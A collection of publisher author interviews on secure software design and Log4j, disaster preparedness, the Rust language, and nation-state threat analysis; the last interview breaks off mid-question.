LK: I don't think it's possible to "fix" that, because it boils down to trust in the signing party and their competence. For example, if we are signing a contract and a lawyer uses sleight-of-hand to substitute a fraudulent version, I can be deceived into providing a valid legal signature. I don't know exactly what happened at SolarWinds, but they are the ones ultimately responsible for their code-signing key. In hindsight, I wonder if they fully realized how attractive their product could be to a sophisticated threat actor, and if they took the necessary precautions against that—which would be considerable. (For the record, I was not involved in the creation of the X.509 specification.)

Generally speaking, code signing is problematic because if vulnerabilities are found later, the signature remains valid—even though the code is known to be unsafe and no longer trustworthy. Administrators must go beyond checking for valid signatures, and also ensure that it's the latest version available, before trusting any code, and of course promptly install future updates that fix critical issues.

 

NSP: On that note, the concept of “good enough security” is predicated on the belief that the threat landscape is somehow static in nature. One thing you really stress in the book is the importance of understanding the full range of potential threats to information systems—and that means accepting that there are adversaries out there whose capabilities are higher than the current standards software developers abide by. How can dev and ops teams work together to implement security measures that not only address what is known, but also deal with threats as they evolve over time, so they can stay a step ahead of persistent adversaries?

LK: Just as you say, broad and deep threat-awareness is important as a starting point, and then the really hard part is choosing mitigations and ensuring that they do the job intended. This is a subjective process, and if you really want to stay ahead, as you say, that usually means aggressively mitigating just about every threat that you can identify, so as not to be blindsided.

Excellent point about the dangers of treating the threat landscape as static, and this is also a strong argument for moving left—because the more mitigation you work into the design, the better. (Plus, as the environment evolves, it's very hard to go back to the design for a redo!)

 

NSP: It’s common knowledge that “all software has bugs,” and that a subset of those bugs will be exploitable—ergo, the challenge of secure coding essentially amounts to not introducing flaws that become exploitable vulnerabilities. Seems easy enough! But programmers are only human, and while many of them make the effort to build protection mechanisms that improve safety in, say, the features of APIs, what are some everyday programming pitfalls you see as the root causes of most security failings?

LK: While “all software has bugs” is generally accepted as true, too often I think the connection to vulnerabilities is under-recognized. Instead, it's easy to rationalize lower quality standards since the end product will have bugs anyway. Part III of the book covers many of just these common pitfalls in a little over 100 pages, so I won't attempt to summarize all that here.

If your question about root causes goes deeper, asking why programming languages and API are so prone to security problems, then I would say it's often simply because the practice of software development goes back before there was much awareness of security. For example, the C language has been profoundly influential, and it's still widely used, but it also gave us arithmetic overflow and buffer overruns. The inventors surely knew about these potential flaws but had no way to imagine the 2022 digital ecosystem, and threats like ransomware. The same goes for API, which can fail to anticipate evolving threats that, once distributed, are very hard to fix later.

Another common cause in API design is failing to present a clean interface, in terms of trust relationship and security responsibility. API providers naturally want to offer lots of features and options, yet this makes the interface complicated to use. Since the implementation behind the API is typically opaque to the caller, it's easy for a mistake to arise. So it's imperative for the API documentation to provide clear security commitments, or detail exactly what precautions callers must take and why. Log4j is a perfect example of this problem: surely most applications reasonably assumed it was safe to log untrusted inputs, but the JNDI feature—that they may not even have been aware of—offered attackers an attractive point of entry.

 

NSP: Since you brought it up, and it sort of ties together everything we’ve been discussing, let’s talk about that Apache Log4j zero-day vulnerability (which continues to make headlines). Here we have a Java-based logging library used by millions of applications, that has a critical flaw described as basically “trivial” to exploit. Why is this bug considered so incredibly severe? And, even though your book was released before the issue was discovered, are there any nuggets of wisdom in it that address this type of issue—or that could help software developers solve the problems that led to it?

LK: Log4j could be the poster child for the importance of security design reviews. Much has been written already by folks who have examined this extensively, but clearly allowing LDAP access via JNDI was a design flaw. Whether the designer(s) recognized the threat or not, mitigated insufficiently, or simply failed to understand the consequences, is hard to say without a design document (much less a review). Skipping secure design and review means missing the best opportunities to catch exactly this sort of vulnerability before it ever gets released in the first place.

This vulnerability is nearly a Perfect Storm because of a combination of factors: it allows remote code execution (RCE) attacks, the vulnerable code is very widely used by Java applications, and as a logging utility it's often exposed to the attack surface. That last point deserves elaboration: attackers often poke at internet-facing interfaces using malformed inputs in hopes of triggering a bug that might be a vulnerability; and developers want to monitor the use of these interfaces, so they log the untrusted input, creating a direct connection to the vulnerable code in Log4j. It so happens that the book includes an example design document for a simple logging system (Appendix A), and that API explicitly uses structured data (as JSON) rather than strings with escape sequences that got Log4j into trouble.

Furthermore, threat modeling and secure software design should have informed all applications using Log4j of the risks involved in logging untrusted inputs. In the book's Afterword, I write about using software bills of material (that would have identified which applications use Log4j), and the importance of promptly updating dependencies (in this case, the slow response to Log4j is why it's still in the news), just to name a few additional mitigations that’d help. (I posted about Log4j at more length last year when it first became public.)

NSP: Wow, Loren—maybe you should come out of retirement! At the very least, Designing Secure Software should be required reading for everyone in the field, and it’s clearly becoming more urgent with every passing day.

LK: Thanks for your kind words and this opportunity to reflect on current events. The book is my way of stepping out of retirement to share what I've learned in hopes of nudging the industry in some good new directions. I certainly recognize that investing security effort from the design stage runs counter to a lot of prevailing practice, but I've seen it practiced to good effect, and now there's a manual available if anyone wants to try the methodology.

I think that our discussion nicely shows the value of moving beyond reactive security, moving left to be more proactive. The book offers lots of actionable ideas, and it's written for a broad software audience so we can get more developers as well as management, interface designers, and other stakeholders all involved. No doubt security lapses will continue to occur—but when they do, we need more transparency to fully understand exactly what happened and how best to respond, and then to take those learnings and institute the changes necessary to improve in the future.

 

The End Is (Not) Nigh: Disaster Prepping with Michal Zalewski


For our first Author Spotlight interview of 2022, we have illustrious guest Michal Zalewski—world-class security researcher and author of the newly released Practical Doomsday: A User’s Guide to the End of the World. In the following Q&A, we talk with him about taking disaster preparedness back from the fringe, what he's learned from living through numerous calamities, the reason hackers have the edge over doomsday preppers in any real emergency, and why he’s got a solid backup plan “if this whole computer thing turns out to be a passing fad.”

Practical Doomsday cover Michal Zalewski avatar

Michal Zalewski (aka lcamtuf) has been the VP of Security & Privacy Engineering at Snap Inc. since 2018, following an 11-year stint at Google, where he built the product security program and helped set up a seminal bug bounty initiative. Originally hailing from Poland, he kick-started his career with frequent BugTraq posts in the ’90s, and went on to identify and publish research on hundreds of notable security flaws in the browsers and software powering our modern internet. In addition to his influence on the tech industry, Zalewski's known as the developer of the American Fuzzy Lop open-source fuzzer and other tools. He's also the author of two classic security books via No Starch Press, The Tangled Web (2011) and Silence on the Wire (2005), and is a recipient of the prestigious Lifetime Achievement Pwnie Award.


NSP: Gratulacje on your new book, Michal! Suffice it to say, a practical prep guide for doomsday scenarios could not be more timely (...all things considered). You even joke on Twitter that the past few years were an elaborate viral marketing campaign for the book’s release. But in fact, you’ve been writing on this subject since at least 2015. What first lured you into the disaster-preparedness genre?

Michal Zalewski: I keep asking myself the same question! For one, I simply grew up at an interesting time and in an interesting place: in a failed Soviet satellite state going through a period of profound political and economic strife. As a child, I didn’t think of it much, but as an adult, I look at my early years with a degree of terror and awe.

I also have this geeky curiosity about how complex systems work and how they might fail—and to be frank, I can’t quite grasp why we look at this problem so differently in the physical world versus the digital realm. After all, it’s normal to back up our files or use antivirus software; why is it wacky to buy fire extinguishers for one’s home or store several gallons of water and some canned food?

In my mind, risk modeling and common-sense preparations shouldn’t be a political issue and shouldn’t be the domain of people who are convinced that the end is nigh. If anything, having a backup plan is a wonderful way to dispel some of the worries and anxieties of everyday life.
 

NSP: Your personal bio illustrates one of the key points in the book—that disasters are not rare. In addition to growing up in Poland in the '80s, the book also brings up the experience of living through 9/11, the dot-com crash, and the housing crisis of 2008. Would you explain that larger theme within the context of your own trials and tribulations?

MZ: Oh, I don’t want to oversell my life story! My experiences are shared by tens of millions of people around the globe. Countless others have lived through much worse— famine, devastating natural disasters, wars.

I’m going to say one thing, though. Living through a sufficient number of calamities reveals a simple truth: that every generation gets to experience their own “winter of the century,” “recession of the century,” “pandemic of the century,” and so on. And every time, such events catch them off guard.

In most cases, it’s not a matter of life and death; most people make it through recessions, wildfires, and floods. But having a robust plan can make the situation much less stressful, and can make the recovery more certain and more swift.
 

NSP: Most people picture doomsday preppers as ex-military survivalist-types—not a self-described “city-raised computer nerd.” How has your hacker background informed the emergency-preparedness thought process you’re teaching readers in the book?

MZ: If there’s one obvious difference, it’s that in the physical realm, life-threatening incidents are fairly rare. In the world of computing, on the other hand, networks and applications are under constant attack. When you work in this domain, I think you start to appreciate the saying attributed to Mike Tyson: “everyone has a plan until they get punched in the mouth”— that is, theory seldom survives the clash with reality. By the end of the day, the surest way to get through an emergency is to be adaptable and resilient, not to have an impressive stockpile guns and bushcraft tools.

Another principle I picked up from the world of information security is that there is no limit to how much time, effort, and money you can spend in the pursuit of perfection—but perfection is not necessarily a useful goal. A good preparedness strategy needs to zero in on problems that are important, plausible, and can be addressed in a cost-effective way, without jeopardizing your quality of life should the apocalypse not come.
 

NSP: As a teenager, you became active in Europe’s fledgling infosec community, which led to consulting projects, pentesting gigs and, eventually, a remarkable career in the industry. Based on your own success, what do you think it takes to truly succeed in the infosec field and/or what’s your best career advice for aspiring security researchers?

MZ: I try to be careful with career advice—sometimes, people are successful despite their habits, not because of them. That said, I certainly found it helpful to always approach security in a bottom-up fashion. If you make the effort to understand how the underlying technologies really work, their failure modes become fairly self-evident too.

My best advice for aspiring professionals is different, though: perhaps the most underrated skill in tech are solid writing skills. That’s because technical prowess is not sufficient to succeed—you need to get others on board. I have a short Twitter thread with a handful of tips here.
 

NSP: In addition to your street cred in the security world, you’re credited with (inadvertently) helping hackerdom in another realm entirely—Hollywood. The Matrix Reloaded is lauded as the first major motion picture to accurately portray a hack. More specifically, your hack. For those who haven’t seen it, Trinity uses an Nmap port scan, followed by an SSH exploit to break into a power company and disable the city’s electric grid. In 2001, you discovered the SSH bug being depicted on screen. Can you tell us anything about your vulnerability report being in one of the movie’s most pivotal scenes?

MZ: I wish I had a cool story to tell! I was surprised (and flattered) to see my bug on the big screen. My other cinematic claim to fame is having my fuzzer—American Fuzzy Lop—surface in the TV series Mr. Robot.

Of course, my screen credits pale in comparison with the track record of the aforementioned NMap tool. The network scanner makes an appearance in at least a dozen films and TV series, reportedly including at least one porn flick.
 

NSP: In an example of life imitating art, the intelligence community has recently sounded the alarm over an “unprecedented” uptick in hackers targeting electric grids. Maybe if the fictional power company in The Matrix Reloaded had someone like you working for them, Trinity’s blackout-inducing exploit would have failed—which begs the question: do you think white-hat hackers could be the answer to the risk that APTs pose to critical infrastructure? Is it as simple as utility providers adopting bug-bounty bounty programs, such as the one your team launched at Google a decade ago?

MZ: Bug bounties are a cherry on top for a mature security program: they are a last-resort mechanism to catch a fraction of mistakes that slip past your internal defenses. But if you’re routinely letting vulnerabilities ship to production and then hope that talented strangers will catch them all, you’re playing a very dangerous game.

A comprehensive security program starts with minimizing the risk of such mistakes in the first place: building automation that makes it easy to do the right thing and difficult for humans to mess up. The second layer of defense are internal processes for vetting the design and implementation of your systems, and for penetration-testing or fuzzing the products before they go out the door.

Still, the problem faced by most utilities isn’t related to any of this: it’s that we have a fairly small pool of infosec talent and that companies are fiercely competing for that talent. The Wyoming Rural Electric Association doesn’t have it easy when even the most junior security engineer can land an interview with Amazon, Goldman Sachs, or SpaceX.
 

NSP: From your early years posting software vulnerabilities on BugTraq, to your research exposing the flawed security models of web browsers, to helping Google build its massive product security program, you've become known as one of the most influential people in infosec. Over the same decades, the internet has gone from a place of dial-up connections and friendly message-boards to a global network that governs nearly every aspect of digital society. Given your unique vantage point in this regard, what do you think is the most pressing challenge in the industry today?

MZ: I'm not an infosec malcontent—I think our industry has made impressive progress when it comes to reasoning about and reducing the risk of most types of security flaws. But as you note, the stakes are getting higher too: nowadays, almost everything is connected to the internet, and even the humble thermostat on your wall might be running more than ten millions lines of code. This makes absolute security a rather challenging goal.

In light of this, the two keywords that come to mind are "compartmentalization" and "containment." You have to plan for unavoidable mishaps and must have a way to prevent them from turning into disasters. For enterprises, this may involve dividing systems into smaller, well-understood blocks that can be cordoned off and monitored for anomalies with ease. The technologies and the architecture paradigms that make this possible are still in their infancy, but I think they hold a lot of promise.

Of course, we can practice compartmentalization and containment in everyday life, too. Perhaps only so much in your life should depend on the security of a single email provider or a single bank.
 

NSP: Last question! One of the prepper commandments in your book is, simply, “Learn new skills.” Why is this important for building a comprehensive disaster-preparedness plan, and what are some useful secondary skills that you have developed outside of infosec?

MZ: The point I make in the book is that the accelerating pace of technological change means that fewer and fewer jobs are for life. You know, in the 1990s, opening a VHS rental place or a music store was a sound business plan, journalism was a revered and well-paying gig, and the photographic film industry was a behemoth that consumed about a third of the global silver supply. We are probably going to see similar shifts in the coming decades. In particular, I’m not at all convinced that software engineers are still going to be an elite profession in 20-30 years.

It’s hard to predict the future, but it’s possible to hedge our bets—say, by pursuing potentially marketable hobbies on the side. Even if nothing happens, such pursuits are still rewarding on their own. I enjoy woodworking and tinkering with electronics. I could probably turn these hobbies into gainful employment if this whole computer thing turns out to be a passing fad.
 


*Use coupon code SPOTLIGHT30 to get 30% off your order of Practical Doomsday through March 9, 2022.
 

Live Coder Jon Gjengset Gets into the Nitty-Gritty of Rust


Our always fascinating Author Spotlight series continues with Jon Gjengset – author of Rust for Rustaceans. In the following Q&A, we talk with him about what it means to be an intermediate programmer (and when, exactly, you become a Rustacean), how Rust “gives you the hangover first” for your code's own good, why getting over a language's learning curve sure beats reactive development, and how new users can help move the needle toward a better Rust.

Rust for Rustaceans cover Jon Gjengset headshot

A former PhD student in the Parallel and Distributed Operating Systems group at MIT CSAIL, Gjengset is a senior software engineer at Amazon Web Services (AWS), with a background in distributed systems research, web development, system security, and computer networks. At Amazon, his focus is on driving adoption of Rust internally, including building out internal infrastructure as well as interacting with the Rust ecosystem and community. Outside of the 9-to-5, he conducts live coding sessions on YouTube, is working on research related to a new database engine written in Rust, and shares his open-source projects on GitHub and Twitter.


No Starch Press: Congratulations on your new book! Everyone digs the title, Rust for Rustaceans – which is a tad more fitting than its original moniker, Intermediate Rust. I only bring this up because both names speak to who the book is for. Let’s talk about that. What does “intermediate'' mean to you in terms of using Rust? Specifically, what gap does your book fill for those who may have finished The Rust Programming Language, and are now revving to become *real* Rustaceans?

Jon Gjengset: Thank you! Yeah, I’m pretty happy with the title we went with, because as you’re getting at, the term “intermediate” is not exactly well-defined. In my mind, intermediate encapsulates all of the material that you wouldn’t need to know or feel comfortable digging into as a beginner to the language, but not so advanced that you’ll rarely run into it when you get to writing Rust code in the wild. Or, to phrase it differently, intermediate to me is the union of all the stuff that engineers working with Rust in real situations would pick up and find continuously useful after they’ve read The Rust Programming Language.

I also want to stress that the book is specifically not titled "The Path to Becoming a Rustacean," or anything along those lines. It’s not as though you’re not a real Rustacean until you’ve read this book, or that the knowledge the book contains is something every Rustacean knows. Quite the contrary – in my mind, you are a Rustacean from just before the first time you ask yourself whether you might be one, and it’s at that point you should consider picking up this book, whenever that may be. And for most people, I would imagine that point comes somewhere around two thirds through The Rust Programming Language, assuming you’re trying to actually use the language on the side.
 

NSP: Rust has been voted “the most loved language” on Stack Overflow for six years running. That said, it's also gained a reputation for being harder to learn than other popular languages. What do you tell developers who are competent in, say, Python but hesitant to try Rust because of the perceived learning curve?

JG: Rust is, without a doubt, a more difficult language to learn compared to its various siblings and cousins, especially if you’re coming from a different language that’s not as strict as Rust is. That said, I think it’s not so much Rust that’s hard to learn as it is the principles that Rust forces you to apply to your code. If you’re writing code in Python, to use your example, there are a whole host of problems the language lets you get away with not thinking about – that is, until they come back to bite you later. Whether that comes in the form of bugs due to dynamic typing, concurrency issues that only crop up during heavy load, or performance issues due to lack of careful memory management, you’re doing reactive development. You build something that kind of works first, and then go round and round fixing issues as you discover them.

Rust is different because it forces you to be more proactive. An apt quote from RustConf this year was that Rust “gives you the hangover first” – as a developer you’re forced to make explicit decisions about your program’s runtime behavior, and you’re forced to ensure that fairly large classes of bugs do not exist in your program, all before the compiler will accept your source code as valid. And that’s something developers need to learn, along with the associated skill of debugging at compile time as opposed to at runtime, as they do in other languages.

It’s that change to the development process that causes much of (though not all of) Rust’s steeper learning curve. And it’s a very real and non-trivial lesson to learn. I also suspect it’ll be a hugely valuable lesson going forward, with the industry’s increased focus on guaranteed correctness through things like formal verification, which only pushes the developer experience further in this direction. Not to mention that the lessons you pick up often translate back into other languages. When I now write code in Java, for instance, I am much more cognizant of the correctness and performance implications of that code because Rust has, in a sense, taught me how to reason better about those aspects of code.
 

NSP: In the initial 2015 release announcement, Rust creator Graydon Hoare called it “technology from the past come to save the future from itself.” More recently, Rust evangelist Carol Nichols described it as “trying to learn from the mistakes of C, and move the industry forward.” To give everyone some context for these sentiments, tell us what sets Rust apart safety-wise from “past” systems languages – in particular, C and C++ – when it comes to things like memory and ownership.

JG: I think Rust provides two main benefits over C and C++ in particular: ergonomics and safety. For ergonomics, Rust adopted a number of mechanisms traditionally associated with higher-level languages that make it easier to write concise, flexible, (mostly) easy-to-read, and hard-to-misuse code and interfaces – mechanisms like algebraic data types, pattern matching, fairly powerful generics, and first-class functions. These in turn make writing Rust feel less like what often comes to mind when we think about system programming – low-level code dealing just with raw pointers and bytes – and makes the language more approachable to more developers.

As for safety, Rust encodes more information about the semantics of code, access, and data in the type system, which allows it to be checked for correctness at compile-time. Properties like thread safety and exclusive mutability are enforced at the type-level in Rust, and the compiler simply won’t let you get them wrong. Rust’s strong type system also allows APIs to be designed to be misuse-resistent through typestate programming, which is very hard to pull off in less strict languages like C.

Rust’s choice to have an explicit break-the-glass mechanism in the form of the unsafe keyword also makes a big difference, because it allows the majority of the language to be guaranteed-safe while also allowing low-level bits to stay within the same language. This avoids the trap of, say, performance-sensitive Python programs where you have to drop to C for low-level bits, meaning you now need to be an expert in two programming languages! Not to mention that unsafe code serves as a natural audit trail for security reviews!
 

NSP: Along those same lines, Rust (like Go and Java) prevents programmers from introducing a variety of memory bugs into their code. This got the attention of the Internet Security Research Group, whose latest project, Prossimo, is endeavoring to replace basic internet programs written in C with memory-safe versions in Rust. Microsoft has also been very vocal about their adoption of Rust, and Google is backing a project bringing Rust to the Linux kernel underlying Android. As Rust is increasingly embraced and used for bigger and bigger projects, are there any niche or large-scale applications, or certain technology combos you’re most excited about?

JG: Putting aside the discussion about whether Rust prevents the same kinds of bugs in the same kinds of ways as languages like Go and Java, it’s definitely true that the move to these languages represent a significant boost to memory safety. And I think Rust in particular unlocked another segment of applications that would previously have been hard to port, such as those that would struggle to operate with a language runtime or automated garbage collection.

For me, some of the most exciting trajectories for Rust lie in its interoperability with other systems and languages, such as making Rust run on the web platform through WASM, providing a better performance-fallback for dynamic languages like Ruby or Python, and allowing component-by-component rewrites in established existing systems like cURL, Firefox, and Tor. The potential for adoption of Rust in the kernel is also very much up there if it might make kernel development more approachable than it currently is – kernel C programming can be very scary indeed, which means fewer contributors dare try.
 

NSP: In the book’s foreword, David Tolnay – a prolific contributor to the language, who served as your technical reviewer – says that he wants readers to “be free to think that we got something wrong in this book; that the best current guidance in here is missing something, and that you can accomplish something over the next couple years that is better than what anybody else has envisioned. That’s how Rust and its ecosystem have gotten to this point.” The community-driven development process he’s referencing is somewhat unique to Rust and its evolution. Could you briefly explain how that works?

JG: I’m very happy that David included that in his foreword, because it resonates strongly with me coming from a background in academia. The way we make progress is by constantly seeking to find new and better solutions, and questioning preconceived notions of what is and isn’t possible, or how things “should” be done. And I think that’s part of how Rust has managed to address as many pain points as it does. The well-known Rust adage of “fast, reliable, productive, pick three” is, in some sense, an embodiment of this sentiment – let’s not accept the traditional wisdom that this is a fundamental trade-off, and instead put in a lot of work and see if there’s a better way.

In terms of how it works in practice, my take is that you should always seek to understand why things are the way they are. Why is this API structured this way? Why doesn’t this type implement Send? Why is static required here? Why does the standard library not include random number generation? Often you’ll find that there is a solid and perhaps fundamental underlying reason, but other times you may just end up with more questions. You might find an argument that seems squishy and soft, and as you start poking at it you realize that maybe it isn’t true anymore. Maybe the technology has improved. Maybe new algorithms have been developed. Maybe it was based on a faulty assumption to begin with. Whatever it may be, the idea is to keep pulling at those threads in the hope that at the other end lies some insight that allows you to make something better.

The end result could be an objectively better replacement for some hallmark crate in the ecosystem, an easing of restrictions in the type system, or a change to the recommended way to write code – all of which move the needle along towards a better Rust. That sentiment's best summarized by David Tolnay’s self-quote from 2016: “This language seems neat but it's too bad all the worthwhile libraries are already being built by somebody else.”
 

NSP: Alumni of the Rust Core team have said that it’s a systems language designed for the next 40 years – quite an appealing hook for businesses and organizations that want their fundamental code base to be usable well into the future. What are some of the key design decisions that have made Rust, in effect, built to last?

JG: Rust takes backwards compatibility across versions of the compiler very seriously, and the intent is that (correct) code that compiled with an older version of the compiler should continue to compile indefinitely. To ensure this, larger changes to the language are tested by re-building all versions of all crates published to crates.io to check that there are no regressions. Of course, the flip side of backwards compatibility is that it can be difficult to make improvements to the language, especially around default behavior.

The Rust project’s idea to bridge this divide is the “edition” system. At its core, the idea is to periodically cut new Rust editions that crates can opt into to take advantage of the latest non-backwards-compatible improvements, but with the promise that crates using different editions can co-exist and interoperate, and that old editions will continue to be supported indefinitely. This necessarily limits what changes can be made through editions, but so far it has proven to be a good balance between “don’t break old stuff” and “enable development of new stuff” that is so vital to a language’s long-term health.

The Rust community’s commitment to semantic versioning also underpins some of Rust’s long-term stability promises – that is, by allowing crates to declare through their version number when they make breaking changes, Rust can ensure that even as dependencies change, their dependents will continue to build long into the future (though potentially losing out on improvements and bug fixes as old versions stop being maintained).
 

NSP: One of the goals listed on the Rust 2018 roadmap was to develop teaching resources for intermediate Rustaceans, which I believe is what spurred you to start streaming your live-coding sessions on YouTube. Developers have really embraced them as a way of learning how to use Rust “for real.” Why is it useful, in your view, for newcomers to see an experienced Rust programmer go through the whole development process and see real systems implemented in real time?

JG: Learning a language on your own is a daunting task that requires self-motivation and perseverance. You need to find a problem you’re interested in solving; you need to find the will to get through the initial learning curve where you’ll get stuck more often than you’ll make meaningful progress; and you have to accept the inevitable rabbit holes that you’ll go down when it turns out things don’t work the way you thought they did. That’s not an insurmountable challenge, and some people really enjoy the journey, but it is also time-consuming, humbling and, at times, quite frustrating. Especially because it can feel like you’re infinitely far from what you really wanted to build.

Watching experienced developers build something, especially if you’re watching live and can ask questions, provides a shortcut of sorts. You get to be directly exposed to good development and debugging processes; you get exposure to language mechanisms and tools that you may otherwise not have found for a while on your own; and you spend less time stuck searching for answers, since the experienced developer can probably explain why something doesn’t work shortly after discovering the problem. Of course, it’s not a complete replacement. You don’t get as much of a say in what problem is being worked on, which means you may not be as invested in it, and you won’t get the same exposure to teaching resources that you may later need as you’re trying to work things out on your own. Ultimately, I think of it as a worthwhile “experience booster” to supplement a healthy and steady diet of writing code yourself.
 

NSP: The popularity of your videos notwithstanding, you’ve said that part of what inspired you to write the book is that “they’re not for everyone,” and that some people – yourself included – have a different learning style. Given both mediums cover advanced topics (pinning, async, variance, and so on), would you say the book is an alternative to the live coding sessions, or is it designed to complement them? In other words, would a developer who’s watched your videos still benefit from the book (and vice versa)?

JG: It’s a bit of a mix. The "Crust of Rust" videos cover topics that are covered in the book, and the book covers topics in my videos, but often in fairly different ways. I think it’s likely that consuming both still leads to a deeper understanding than consuming either in isolation. But I also think that consuming either of them should be enough to at least give you the working knowledge you need to start playing with a given Rust feature yourself.

For readers of the book, I would actually recommend watching one of the longer live-coding streams on my channel (over the Crust videos), because they cover a lot of ground that’s hard to capture in a book. Topics like how to think about an error message, or how to navigate Rust documentation work best when demonstrated in practice. And who knows – you may even find the problem area interesting enough that you watch the whole thing to the end!

And with that… std::process::exit
 

Cracking Cybercrimes with Threat Analyst Jon DiMaggio


Our illuminating Author Spotlight series continues this month with Jon DiMaggio – author of The Art of Cyberwarfare: An Investigator's Guide to Espionage, Ransomware, and Organized Cybercrime (March 2022). In the following Q&A, we talk with him about the difference between traditional threats and nation-state attacks, the reasons that critical infrastructure is an easy target for threat actors, the emerging "magic formula" for defeating ransomware, and the fact that just because you're paranoid doesn't mean they aren't targeting you on social media.

Art of Cyberwarfare cover Jon DiMaggio headshot

DiMaggio is a recognized industry veteran in the business of “chasing bad guys,” with over 15 years of experience as a threat analyst. Currently he serves as chief security strategist at Analyst1, and his research on Advanced Persistent Threats (APTs) has identified enough new tactics, techniques, and procedures (TTPs) to garner him near-celebrity status in the cyber world. A fixture on the speaker circuit and at conferences, including RSA (and this month’s CYBERWARCON), DiMaggio has also been featured on Fox, CNN, Bloomberg, Reuters TV, and in publications such as WIRED, Vice, and Dark Reading. He continues to write professional blog posts, intel reports, and white papers on his research into cyber espionage and targeted attacks – insights that have been cited by law enforcement and used in nation-state indictments.


No Starch Press: You’re known as one of the first intelligence analysts to focus on attacks executed by nation-state hacking groups – referred to as Advanced Persistent Threats. What’s the difference between traditional cyberattacks and APTs?

Jon DiMaggio: Traditional cybercriminals conduct attacks relying on a user to click a link in an email or visit a specific website. If the attack fails or security mechanisms defeat the threat before it can successfully infect a victim, the attack is over. That's why, with some exceptions, traditional attacks are geared at targets of opportunity, and not tailored to a specific victim.

Nation-state attacks, however, are the exact opposite. Nation-state attackers target specific victims, and are not only motivated but well-resourced. These advanced attackers have the backing of a government, and often develop their own malware and infrastructure to use in their attacks. Also, unlike traditional threats, nation-state attackers are rarely motivated by financial gain. Instead, they seek to steal intellectual property, sensitive communications, and other data types to advance or provide an advantage to their sponsoring nation.
 

NSP: Governments and militaries are no longer the only targets of nation-state hackers – private-sector companies are now under attack as well. Most of them already have automated security mechanisms, but are those an adequate defense against APTs?

JD: No. Due to the human element behind nation-state attacks, automated security defenses are not enough. Human-driven attacks simply return to the system through another door. And unlike other threats, nation-state attackers are in it for the long game, which is why the attacks continue even if initially defeated by automated defenses. For these reasons, you must handle nation-state attacks differently than any other threat your organization will face – ideally, by deploying human threat hunters.
 

NSP: Another disturbing trend is the growing list of advanced cyber threats targeting the industrial control systems (ICS) of critical infrastructure, like the U.S. power grid. In terms of cyberwarfare, are we getting closer to seeing intrusion campaigns against our electrical, water, and transportation systems escalate from espionage or reconnaissance missions to highly disruptive attacks that could paralyze entire cities?

JD: Not only are we getting closer to attackers getting closer to our critical infrastructure, but it has already happened in other countries. In 2015, the Russian government conducted cyber attacks that resulted in shutting down power across critical areas of Ukraine.

In 2017, when I worked at Symantec, our team discovered a Russian-based nation-state attacker we dubbed "Dragon Fly," who infiltrated the U.S. power grid. The group was very close to gaining access to critical systems responsible for powering cities across the United States. In this case, security companies and the federal government worked together to mitigate the threat. This was a close call, but it just shows that nation-states are targeting our power grid – and likely will continue the effort moving forward.
 

NSP: In early October, the FBI and Cybersecurity Infrastructure and Security Agency (CISA) issued a warning that ransomware attackers, in particular, have been targeting water treatment and wastewater facilities. Do you have any insight into why ransomware attackers have recently moved from banks, local governments and healthcare systems to utility companies? Moreover, why are these critical facilities still so vulnerable to compromise given what we know about the threat and what’s at stake?

JD: Critical infrastructure appeals to ransomware attackers because they likely feel there is a greater chance the victim will pay. Additionally, the breach will be very apparent to the public, like in the Colonial Pipeline attack, when fuel stopped flowing and it resulted in a gas shortage across the East Coast. The effect of this type of attack is meant to be dramatic, and attackers know there will be high pressure from the general public to recover quickly. Usually, the fastest way to recover is to pay the ransomware and obtain the decryption key.

Also, critical infrastructure often provides an easy target to savvy attackers. For example, when a cybercriminal attacked the water system in Florida last year, he did so by taking advantage of technology and infrastructure that allowed workers to remotely access the critical controls used to regulate the system. In short, the ease of access for city workers was more important than the system's security. This, unfortunately, is a common problem. To address many of these existing vulnerabilities will require building systems based on security – and not ease of use. While this may be less important to a retail provider, it should not be an option for industries involved with our infrastructure.
 

NSP: Over the past year you’ve focused your expertise on nation-state ransomware. One thing I’ve learned from your work is just how long sophisticated intruders spend in a victim’s network before kidnapping their data and sending a ransom notice, often lurking for weeks if not months. Why is attacker “dwell” time an important security metric?

JD: Yes, that's a point many security analysts are unaware of. Enterprise ransomware gangs spend between 3 to 21 days on a victim network, with the average time being around 10 days. During this time, the attacker enumerates the network, obtains and escalates their privileges, disables security services, delete backups, and steals the victim's sensitive data. Finally, once the staging and data theft phase is complete, they execute the ransomware payload throughout the victim's network.

The reason this timeframe is so important is that the human attacker is active on your network. The takeaway is that the longer the attacker engages within your network, the better chance a good threat-hunting team will have to find them. This is why I keep emphasizing that you really need a human team to hunt for advanced threats, not simply rely on automated defenses.
 

NSP: As ransomware has evolved and diversified, AI has found its way into the mix, turbo-charging attacks that can automatically scan networks for weaknesses, exploit firewall rules, find open ports that have been overlooked, and so on. But machine learning works both ways. What role could AI tools play in threat hunting?

JD: The combination of both artificial intelligence along with human threat hunters creates the magic formula necessary to defeat ransomware attacks. AI is one of the fastest and most accurate ways to identify suspicious or malicious activity, and make quick mitigation decisions.

Based on the level of success ransomware gangs have had in recent years, current identification and mitigation capabilities are not working. At least, not consistently. In fact, several security vendors already base their technologies on artificial intelligence to mitigate threats. For example, the cybersecurity company DarkTrace recently used their tech – which relies on AI – to defeat a LockBit ransomware attack. (LockBit is a particularly pernicious ransomware-as-a-service gang that specializes in fast encryption speeds.) Using AI, DarkTrace identified and mitigated the attack in mere hours of its presence within the environment.
 

NSP: Sounds like the AI future is nigh! Shifting tracks, let's wrap this Q&A up in the present. You chase bad guys for a living. And not just any bad guys – the kind who could bring an entire nation to its knees. But you’re also a dad. Do you talk to your kids about what you do? If so, how do you explain things like nation-state attacks, ransomware gangs, or cyberwarfare on their level (or at least in a way that sounds less scary) when they ask about your day?

JD: I do talk to my kids about what I do. I actually try to get them involved, and spend time teaching them and explaining some of the work I do at a high level. My youngest son Damian and I even did a podcast together on ransomware. My oldest son Anthony is a freshman in high school and just started taking cyber security classes this year.

They think what I do is more like what they see in the movies, so they will be in for a disappointment when they figure out its more research, analysis and writing than hacking bad guys. However, it’s very rewarding that they have an interest in what I do, and often brag to their friends about it. At the same time, they've seen me working with encoded text and malware, and make comments that I stare at “gibberish” all day and pretend to be working! But overall they are really proud of me and think what I do is “cool."

NSP: Part of your objectively "cool" job entails thinking like the adversary. While it seems unlikely a nation-state actor would hijack a home webcam or set up a fake WAP attack at the local cafe, are there any lessons you've learned from a career spent analyzing cyber criminals that inform your personal online security habits outside of work, or that you try to instill in your children?

